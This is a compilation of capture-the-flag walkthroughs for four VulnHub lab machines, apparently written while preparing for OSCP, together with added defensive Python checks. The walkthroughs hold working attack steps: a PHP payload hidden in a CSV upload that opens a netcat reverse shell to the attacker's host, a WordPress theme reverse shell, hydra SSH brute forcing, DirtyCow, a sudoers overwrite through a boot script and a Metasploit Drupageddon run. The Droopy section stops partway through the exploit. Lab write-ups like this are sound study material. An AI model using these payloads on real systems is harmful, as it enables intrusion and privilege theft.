VULNHUB – LAZYSYSADMIN WALKTHROUGH

Foreword

After successfully failing my first OSCP exam, I am still practicing and learning from these machines.

Enumeration

Let's start with enumeration. First, check the website with nikto and nmap, and of course browse the site manually to see if we can find some hints.

NMAP

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info:
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 172.16.132.131
|_  error: Closing link: (nmap@172.16.132.131) [Client exited]
- Nikto v2.1.6/2.1.5
+ Target Host: 172.16.132.134
+ Target Port: 80
+ GET Server leaks inodes via ETags, header found with file /, fields: 0x8ce8 0x5560ea23d23c0 
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: GET /old/: Directory indexing found.
+ GET Entry '/old/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: GET /test/: Directory indexing found.
+ GET Entry '/test/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: GET /Backnode_files/: Directory indexing found.
+ GET Entry '/Backnode_files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET "robots.txt" contains 4 entries which should be manually viewed.
+ OPTIONS Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3268: GET /apache/: Directory indexing found.
+ OSVDB-3092: GET /apache/: This might be interesting...
+ OSVDB-3092: GET /old/: This might be interesting...
+ GET Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.22
+ GET Uncommon header 'x-ob_mode' found, with contents: 0
+ OSVDB-3092: GET /test/: This might be interesting...
+ GET /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: GET /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ GET /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: GET /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ GET Uncommon header 'link' found, with contents: ; rel="https://api.w.org/"
+ GET /wordpress/: A WordPress installation was found.
+ GET /phpmyadmin/: phpMyAdmin directory found
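
The nikto findings above (missing X-Frame-Options, X-XSS-Protection and X-Content-Type-Options, inode-leaking ETags, directory indexing, exposed phpinfo and the robots.txt entries) can be re-checked from the defender's side without nikto. The Python below is an added example, not part of the original walkthrough: it audits an already captured response offline, and the sample response, hardened response and robots.txt are constructed to mirror the output above.

```python
"""Offline audit of one HTTP response for the weaknesses nikto reported.

Added example (not the walkthrough's own tooling). Sample response and
robots.txt below are constructed to mirror the nikto output above."""
import re

# Header -> hardening hint. nikto flags each of these when absent.
EXPECTED_HEADERS = {
    "x-frame-options": "send DENY or SAMEORIGIN to block clickjacking",
    "x-content-type-options": "send nosniff to stop MIME sniffing",
    "x-xss-protection": "legacy header; a Content-Security-Policy is the real fix",
}

# Apache's default FileETag is inode-size-mtime in hex: two or more
# hyphen-separated hex fields, which is what nikto calls an inode leak.
APACHE_ETAG = re.compile(r"[0-9a-f]+(?:-[0-9a-f]+)+")


def audit_response(path, headers, body):
    """Return nikto-style findings for one response (path, header dict, body)."""
    findings = []
    h = {k.lower(): v for k, v in headers.items()}
    for name, hint in EXPECTED_HEADERS.items():
        if name not in h:
            findings.append(f"{path}: missing {name}; {hint}")
    if "x-powered-by" in h:
        findings.append(f"{path}: x-powered-by discloses {h['x-powered-by']}")
    etag = h.get("etag", "").strip()
    if etag.startswith("W/"):
        etag = etag[2:]
    etag = etag.strip('"')
    if APACHE_ETAG.fullmatch(etag):
        findings.append(f"{path}: ETag {etag} leaks inode/size/mtime; set FileETag None")
    if re.search(r"<title>\s*Index of /", body, re.IGNORECASE):
        findings.append(f"{path}: directory indexing enabled; remove Options Indexes")
    if "phpinfo()" in body or re.search(r"<title>\s*PHP Version", body):
        findings.append(f"{path}: phpinfo() output exposed; delete the test script")
    return findings


def robots_disallowed(robots_txt):
    """Return the Disallow entries, i.e. the paths nikto says to review by hand."""
    entries = []
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()
        if line.lower().startswith("disallow:"):
            value = line.split(":", 1)[1].strip()
            if value:
                entries.append(value)
    return entries


# Constructed sample: what /old/ on the box above looked like to nikto.
SAMPLE_HEADERS = {
    "Server": "Apache/2.4.7 (Ubuntu)",
    "X-Powered-By": "PHP/5.5.9-1ubuntu4.22",
    "ETag": '"8ce8-5560ea23d23c0"',
    "Content-Type": "text/html;charset=UTF-8",
}
SAMPLE_BODY = "<html><head><title>Index of /old</title></head><body></body></html>"
SAMPLE_ROBOTS = "User-agent: *\nDisallow: /old/\nDisallow: /test/\nDisallow: /TR2/\nDisallow: /Backnode_files/\n"

# Constructed hardened response: headers present, FileETag None, no indexing.
HARDENED_HEADERS = {
    "Server": "Apache",
    "X-Frame-Options": "SAMEORIGIN",
    "X-Content-Type-Options": "nosniff",
    "X-XSS-Protection": "0",
    "Content-Type": "text/html;charset=UTF-8",
}

if __name__ == "__main__":
    for finding in audit_response("/old/", SAMPLE_HEADERS, SAMPLE_BODY):
        print("+", finding)
    print("+ robots.txt entries to review:", robots_disallowed(SAMPLE_ROBOTS))
    print("+ hardened:", audit_response("/", HARDENED_HEADERS, "<html><title>Backnode</title></html>"))
```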

phpMyAdmin and WordPress are also present. I tried a few login combinations with popular username/password pairs, but no luck. On the WordPress site I found two interesting posts from Admin:

"My name is Togie".

This could be a username, so note this.

I like yogibear Do you like yogibear?

Is it a password??

Tried to log in as togie with the yogibear password on the wp-admin site, but still no luck... Enumerate further.

Samba share

Found a share$ folder which, of course, is password protected. Try our previously found words: yes, the togie/yogibear pair opened a new door.

It looks like the share contains the whole WordPress site and some hints.

Deets.txt

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345 

Todolist.txt

Prevent users from being able to view to web root using the local file browser

Our admin was super lazy, because we can reach the web root. I bet the 12345 password will be useful later.

Harvesting credentials – wp-config.php

I found the login credentials in the wp-config.php file, so we can log in as admin.

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

Reverse shell from WordPress admin panel

I was as lazy as our admin. So in the admin panel go to Appearance/Editor and replace the footer.php code with a PHP reverse shell. Create the listener on our Kali machine on port 4443.

Update the file, reload the site and enjoy the reverse shell.

root@kali:~# netcat -lvvp 4443
listening on [any] 4443 ...
172.16.132.134: inverse host lookup failed: Unknown host
connect to [172.16.132.131] from (UNKNOWN) [172.16.132.134] 57730
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 athlon i686 GNU/Linux
 20:37:32 up 32 min,  0 users,  load average: 0.07, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1178): Inappropriate ioctl for device
bash: no job control in this shell
www-data@LazySysAdmin:/$ 

At this point I have to note that the InspIRCd service on port 6667 possibly has a buffer overflow vulnerability, but this time I chose a simpler method and did not go that way. If I have time for it, a later post will cover it.

Buffer Overflow in InspIRCd → port 6667

  • https://www.cvedetails.com/cve/CVE-2012-1836/

Privilege Escalation

I ran the linenum.py script, which is quite popular for privilege escalation checks. At this point I was totally stuck. I forgot to apply the KISS principle (Keep It Super Simple). MySQL has a UDF vulnerability, but not on this machine.

The togie user is a member of the sudo, adm and other groups, so I have to find a way to log in as that user. No vulnerable service, no misconfigured executable, no usable world-writable files or directories (or I still have a lot to learn...).

After some time I remembered something...

So when I had cooled down and tried practically everything, I reread my previous notes. What if togie is using the password mentioned in the Deets.txt file? Let's try it; the next few lines speak for themselves...

www-data@LazySysAdmin:/$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@LazySysAdmin:/$ su - togie
su - togie
Password: 12345

togie@LazySysAdmin:~$ sudo -l
sudo -l
[sudo] password for togie: 12345

Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL
togie@LazySysAdmin:~$ su -
su -
Password: 12345

su: Authentication failure
togie@LazySysAdmin:~$ sudo su -
sudo su -
root@LazySysAdmin:~#
root@LazySysAdmin:~# cat /root/proof.txt
cat /root/proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie



Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
root@LazySysAdmin:~#

The other method, which I forgot to use earlier, is SSH brute force. Using Metasploit's burnett_top_500.txt wordlist with hydra is also a good option.

[ATTEMPT] target 172.16.132.134 - login "togie" - pass "password" - 1 of 0 [child 500] (0/0)
[ATTEMPT] target 172.16.132.134 - login "togie" - pass "123456" - 2 of 0 [child 500] (0/1)
[ATTEMPT] target 172.16.132.134 - login "togie" - pass "12345678" - 3 of 0 [child 500] (0/2)
[ATTEMPT] target 172.16.132.134 - login "togie" - pass "1234" - 4 of 0 [child 500] (0/3)
[ATTEMPT] target 172.16.132.134 - login "togie" - pass "qwerty" - 5 of 0 [child 500] (0/4)
[ATTEMPT] target 172.16.132.134 - login "togie" - pass "12345" - 6 of 0 [child 500] (0/5)
[ATTEMPT] target 172.16.132.134 - login "togie" - pass "dragon" - 7 of 0 [child 500] (0/6)
[ATTEMPT] target 172.16.132.134 - login "togie" - pass "pussy" - 8 of 0 [child 500] (0/7)
[22][ssh] host: 172.16.132.134   login: togie   password: 12345
[STATUS] attack finished for 172.16.132.134 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-05-01 13:04:16
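
From the defender's side, the hydra run above leaves a distinctive trail in the target's auth.log: a burst of "Failed password" lines from one source within seconds, followed by an "Accepted password" from the same source. The Python detector below is an added example, not part of the original post; the log lines are constructed to mirror the attempt above as the target would have logged it, and the threshold and window values are assumptions.

```python
"""Detect SSH password-guessing bursts in auth.log (added example, not from
the original post). The log below is constructed to mirror the hydra run
above as the target would have seen it: seven failures from one source in a
few seconds, then a success. Threshold and window are assumed values."""
import re
from collections import defaultdict
from datetime import datetime
from typing import NamedTuple

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2"
)


class Alert(NamedTuple):
    ip: str
    user: str
    kind: str        # "burst" or "success_after_burst"
    failures: int


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return Alerts: one when a source reaches `threshold` failures inside the
    window, and one when a login succeeds from a source still inside a burst."""
    recent = defaultdict(list)   # source ip -> timestamps of recent failures
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue             # session/pam lines and anything else are ignored
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        ip = m["ip"]
        recent[ip] = [t for t in recent[ip] if (ts - t).total_seconds() <= window_seconds]
        if m["result"] == "Failed":
            recent[ip].append(ts)
            if len(recent[ip]) == threshold:   # fire once per burst, not per attempt
                alerts.append(Alert(ip, m["user"], "burst", threshold))
        elif len(recent[ip]) >= threshold:
            alerts.append(Alert(ip, m["user"], "success_after_burst", len(recent[ip])))
            recent[ip].clear()
    return alerts


# Constructed auth.log excerpt: the attacker box from the nmap output above
# guessing togie's password, one unrelated failure, then the successful login.
SAMPLE_LOG = """\
May  1 13:04:10 LazySysAdmin sshd[1401]: Failed password for togie from 172.16.132.131 port 40112 ssh2
May  1 13:04:10 LazySysAdmin sshd[1403]: Failed password for togie from 172.16.132.131 port 40114 ssh2
May  1 13:04:11 LazySysAdmin sshd[1405]: Failed password for togie from 172.16.132.131 port 40116 ssh2
May  1 13:04:11 LazySysAdmin sshd[1407]: Failed password for togie from 172.16.132.131 port 40118 ssh2
May  1 13:04:12 LazySysAdmin sshd[1409]: Failed password for togie from 172.16.132.131 port 40120 ssh2
May  1 13:04:12 LazySysAdmin sshd[1411]: Failed password for togie from 172.16.132.131 port 40122 ssh2
May  1 13:04:13 LazySysAdmin sshd[1413]: Failed password for togie from 172.16.132.131 port 40124 ssh2
May  1 13:04:14 LazySysAdmin sshd[1415]: Failed password for invalid user admin from 10.0.0.5 port 51000 ssh2
May  1 13:04:15 LazySysAdmin sshd[1417]: Accepted password for togie from 172.16.132.131 port 40126 ssh2
May  1 13:04:16 LazySysAdmin sshd[1417]: pam_unix(sshd:session): session opened for user togie by (uid=0)
"""

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```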
    
    

Acknowledgement

Thank you for this machine; I learned a lot and still have much to learn.

Enumerate, enumerate, enumerate... Enumeration is the key.

If you are still in progress with your OSCP training or exam, the best advice you can get is the quote above. In the end you will understand what it means.

Dina 1.0 Walkthrough – Vulnhub

Another great Vulnhub virtual machine for beginners, especially for me :). It was fun to test this machine, so thank you Touhid!

Information Gathering

I used nmap and nikto to gather some information.

Nikto results:

+ Target IP: 192.168.1.132
+ Target Hostname: dina.lan
+ Target Port: 80
+ Using Encoding: Random URI encoding (non-UTF8)
+ Start Time: 2017-10-18 18:39:12 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 15:46:52 2017
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3268: /tmp/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ 7444 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2017-10-18 18:39:39 (GMT2) (27 seconds)

Nmap result:

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 5 disallowed entries
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Dina

I checked all the paths above and found some interesting strings on /nothing, in a comment in the page source:

#my secret pass
freedom
password
helloworld!
diana
iloveroot

It looks like we found some passwords. Nice. Let's check the other path, /secure. It contains a password-protected backup.zip file, so I tried the passwords above and successfully unpacked it with the password freedom.

I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....
uname: touhid
password: ******
url : /SecreTSMSgatwayLogin

OK, check that secret SMS gateway. I tried to log in with the username touhid and the passwords found earlier; the working pair was touhid:diana.

The first thing I usually do when I identify a web application is to check exploit-db for available exploits.

PlaySMS 1.4 - 'import.php' Remote Code Execution | php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php' Remote Code Execution / Unrestricted File Upload | php/webapps/42003.txt
PlaySMS 1.4 - Remote Code Execution | php/webapps/42038.txt
PlaySms 0.7 - SQL Injection | linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting | php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions | php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion | php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery | php/webapps/30177.txt

This is all I need. Touhid did a great job finding the vulnerabilities in this application: at least three different ways to run system commands through the PHP system() function.

All right, it's time to get a remote shell.

Gaining remote shell

I tried to run system commands as described in 42044.txt. I tried a lot of things; a simple nc host port -e /bin/bash did not work because this netcat was the OpenBSD version, which lacks the -e option. After a few minutes of research I created a CSV file with the following content:

Name,Email,Department
<?php $cmd='rm -f /tmp/f; mkfifo /tmp/f && cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.109 7777 > /tmp/f 2>&1';system($cmd); ?>,2,3

Luckily, I got a shell!

Privilege escalation

Running whoami told me that my current user is www-data. Okay, check the system. netstat -tlpn showed a MySQL server running on this machine. In the SecreTSMSgatwayLogin directory there was a config.php file; I checked it and found the login and password pair for the database.

root:hello@mysql

Then I selected the playsms database, found the user table and the password hashes:

mysql hashes:

| admin_78f3198ce97ae2bdddb15cc25d559c6f |
| touhid_3a23bb515e06d0e944ff916e79a7775c |

The findmyhash command did not find the password in the public databases. I was too lazy to fire up oclHashcat and brute-force the hash, so I moved on.

I could not get higher privileges through MySQL's system command, so I looked for another way to get root access.

cat /etc/*-release:

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"

Okay, let's invite our dirty friend...

DirtyCow

I am too lazy... Really... At this point I knew what to use. I had a little experience from earlier Vulnhub machines and used the following exploit from exploit-db to escalate privileges: 40839.c
I was lucky: gcc was present on that machine and the exploit compiled without errors.

./exploit 1234

After a few minutes the root user firefart was created with the password 1234. Okay, check the root directory for the flag.

firefart@Dina:/# cat /root/flag.txt
cat /root/flag.txt
________ _________
\________\--------___ ___ ____----------/_________/
\_______\----\\\\\\ //_ _ \\ //////-------/________/
\______\----\\|| (( ~|~ ))) ||//------/________/
\_____\---\\ ((\ = / ))) //----/_____/
\____\--\_))) \ _)))---/____/
\__/ ((( (((_/
| -))) - ))

root password is : hello@3210
easy one …..but hard to guess…..
but i think u dont need root password……
u already have root shelll….

CONGO………
FLAG : 22d06624cd604a0626eb5a2992a6f2e6

Thank you Touhid M.Shaikh for the fun. It was a pleasure to play with this machine.

Vulnhub – Breach 1.0 walkthrough

First let's see what we've got. I did a basic nmap scan:

[screenshot: nmap]

It seems that an active IPS/IDS is present. I tried different nmap evasion techniques, but those did not work: it said that all ports are filtered. I checked manually whether port 80 was open, then fired up Nikto; nothing interesting.

[screenshot: Capture]

Let's look at those images. Voila, a little hint:

[screenshot: hint1.PNG]

Okay, check that source code. Found an interesting line:

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

It looks like a hash or an encoded string. I don't know why, but my first thought was that it is a base64-encoded string. I had to decode the string twice, and that gave me a username:password pair.
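
Layered base64 in an HTML comment is how this credential pair leaked, so a source review check should peel such layers automatically instead of relying on a hunch. The Python below is an added example, not the author's tooling: it pulls comments out of a constructed page built around the comment above and decodes each one until the result is no longer base64 or no longer printable text.

```python
"""Find HTML comments that are really layered base64 (added example, not the
author's tooling). The sample page below is constructed around the comment
quoted above; decoding stops when the text is no longer base64 or printable."""
import base64
import binascii
import re
import string

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]+={0,2}")
COMMENT = re.compile(r"<!-+\s*(.*?)\s*-+>", re.DOTALL)
PRINTABLE = set(string.printable)


def peel_base64(blob, max_layers=8):
    """Decode nested base64 repeatedly. Returns (innermost text, layers peeled)."""
    current = blob.strip()
    layers = 0
    while layers < max_layers:
        if len(current) % 4 or not B64_TOKEN.fullmatch(current):
            break                       # not a complete base64 token any more
        try:
            decoded = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break
        if not set(decoded) <= PRINTABLE:
            break                       # binary, so this layer was not text
        current, layers = decoded, layers + 1
    return current, layers


def encoded_comments(html):
    """Return (raw comment, decoded text, layers) for every comment that decodes."""
    results = []
    for raw in COMMENT.findall(html):
        text, layers = peel_base64(raw)
        if layers:
            results.append((raw, text, layers))
    return results


# Constructed page around the comment found in the walkthrough above.
SAMPLE_HTML = """<html><body>
<!-- normal comment -->
<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->
<p>Initech</p></body></html>"""

if __name__ == "__main__":
    for raw, text, layers in encoded_comments(SAMPLE_HTML):
        print(f"{layers} layer(s): {raw[:24]}... -> {text}")
```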

[screenshot: source_base64]

I did some investigation and found a CMS portal called ImpressCMS (clicked on Employee portal on initech.html). Let's see if we can log in with our username/password pair. Login successful, nice. We have 3 messages in the inbox. Let's see the first:

[screenshot: keyfile]

I downloaded the keyfile located at the root of the website and found out that it is a Java keystore file. I read the two other messages, but those did not help me much. My first thought proved right: an active IDS/IPS is present. I searched for exploits related to ImpressCMS, but the one that could have worked was being trolled:

[screenshot: troll.gif]

At this point I got stuck a bit. Tried dirbuster, different exploits and XSS vulnerabilities on the CMS site, but nothing. Tried to brute force the admin account, but no luck. Investigated the other pictures and pages deeper, nothing interesting. One option left on the CMS site: check pgibbons' profile. I found something interesting:

Published by Peter Gibbons on 2016/6/4 21:37:05. (0 reads)
Team – I have uploaded a pcap file of our red team’s re-production of the attack. I am not sure what trickery they were using but I cannot read the file. I tried every nmap switch from my C|EH studies and just cannot figure it out. http://192.168.110.140/impresscms/_SSL_test_phase1.pcap They told me the alias, storepassword and keypassword are all set to ‘tomcat’. Is that useful?? Does anyone know what this is? I guess we are securely encrypted now? -Peter p.s. I’m going fishing for the next 2 days and will not have access to email or phone.

I opened the pcap file; it contained data, but I did not have a private RSA key to decrypt it. WAIT! I have one! I had to export the RSA private key from .keyfile, and then I was able to see what the heck happened:

[screenshot: pcapcreds]

Tomcat Manager is running on port 8443 (https://192.168.110.140:8443/_M@nag3Me/html/ | login successful with the credentials from Wireshark). What's more, the Wireshark capture gave us a hint that we can run shell commands with the help of cmd.jsp. But where is it? It was uploaded, but the resource cannot be found; the author or a system service may have deleted it. A little googling helped me at this point. I can upload any kind of WAR file, and there is a cmd.war file on the internet (Laudanum) that seems to be the same. So I uploaded it, searched for netcat and made a reverse shell back to my Kali box.

[screenshot: cmd_warcommands_with_jsp]

[screenshot: netcat]

First I tried some Ubuntu 14.04 based kernel exploits, but all of them failed. Finally I gave up probing exploits; instead I sent the LinEnum privilege checker to the victim machine and did a quick investigation of what permissions I have.

MySQL login was successful as root without a password. Nice. I found Milton's username and password hash in the database, then tried to crack the password with oclHashcat. It was successfully recovered, and I tried to change my user from tomcat to milton. It was successful. Another username and password hash was found, but I could not crack this hash within a reasonable time.

[screenshot: mysql.PNG]

After changing user from tomcat to milton I found a "some_script.sh" file with the following content: Nothing here.

Okay, dig deeper. Really. Nothing in here... After some time I found an init script in the init.d folder (portly.sh). This little script redirects all traffic to the portly scanner. Okay, I will use this script to add milton to the sudoers at system startup.

echo 'echo "milton ALL=(ALL) ALL" > /etc/sudoers' > /etc/init.d/portly.sh

After the system reboot I rebuilt my connections, did a quick sudo su as milton and voila, I captured the flag.

[screenshot: breach.PNG]
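
The privilege escalation above works only because an init script that runs as root at boot could be overwritten by an unprivileged account. The Python check below is an added example, not from the original post: it lists files in an init directory that someone other than the trusted owner could modify, demonstrated on a constructed temporary directory (the portly.sh name is reused from the post; the trusted_uid parameter is an assumption so the demo runs as any user).

```python
"""List boot scripts that an unprivileged user could edit (added example, not
from the original post). Run against a real /etc/init.d as root; the demo
below builds a throwaway directory with one safe and one weak script, and
trusted_uid is an assumed parameter so the demo works for any user."""
import os
import stat
import tempfile


def writable_boot_scripts(directory, trusted_uid=0):
    """Return (path, reason) for regular files in `directory` that someone
    other than trusted_uid (normally root) could modify."""
    findings = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if not stat.S_ISREG(st.st_mode):
            continue                    # symlinks and subdirectories are out of scope here
        if st.st_uid != trusted_uid:
            findings.append((path, f"owned by uid {st.st_uid}, not {trusted_uid}"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((path, "world-writable"))
        elif st.st_mode & stat.S_IWGRP and st.st_gid != 0:
            findings.append((path, f"writable by gid {st.st_gid}"))
    return findings


def demo():
    """Constructed init.d: 'ssh' is 0755; 'portly.sh' is 0777, standing in for
    the script that could be overwritten in the walkthrough above."""
    directory = tempfile.mkdtemp(prefix="initd-demo-")
    for name, mode in (("ssh", 0o755), ("portly.sh", 0o777)):
        path = os.path.join(directory, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)
    return writable_boot_scripts(directory, trusted_uid=os.getuid())


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```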

Vulnhub – Droopy: v0.2

Introduction

This is a quick post about how to hack this vulnerable virtual machine from the Vulnhub website. Just to be clear, I am not a security professional; I am just learning and preparing myself for the OSCP exam. If you find any mistake, please let me know.

Walkthrough

First we do some network discovery with netdiscover:

[screenshot: netdisc]

We see that the host is at 192.168.1.159. Let's do an nmap scan:

nmap -sS -A -O -vv 192.168.1.159 -Pn > nmap.txt

PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud…
MAC Address: 00:0C:29:4A:B9:32 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0

Nmap shows that this machine hosts a website on an Apache web server and Drupal is running on it. I investigated the site and it requires a login and password. Fire up the Metasploit Framework and let's do a quick check to find an exploit suitable for our victim. Because Drupal uses a MySQL database, it is quite obvious that a SQL injection could work.

[screenshot: drupal_search]

I chose the third one and crossed my fingers. Boom, we have a meterpreter connection.

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) > options

Module options (exploit/multi/http/drupal_drupageddon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.159    yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The target URI of the Drupal installation
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.200    yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Drupal 7.0 - 7.31

msf exploit(drupal_drupageddon) > exploit

[*] Started reverse TCP handler on 192.168.1.200:4444
[*] 192.168.1.159:80 - Testing page
[*] 192.168.1.159:80 - Creating new user SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 - Logging in as SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 - Trying to parse enabled modules
[*] 192.168.1.159:80 - Enabling the PHP filter module
[*] 192.168.1.159:80 - Setting permissions for PHP filter module
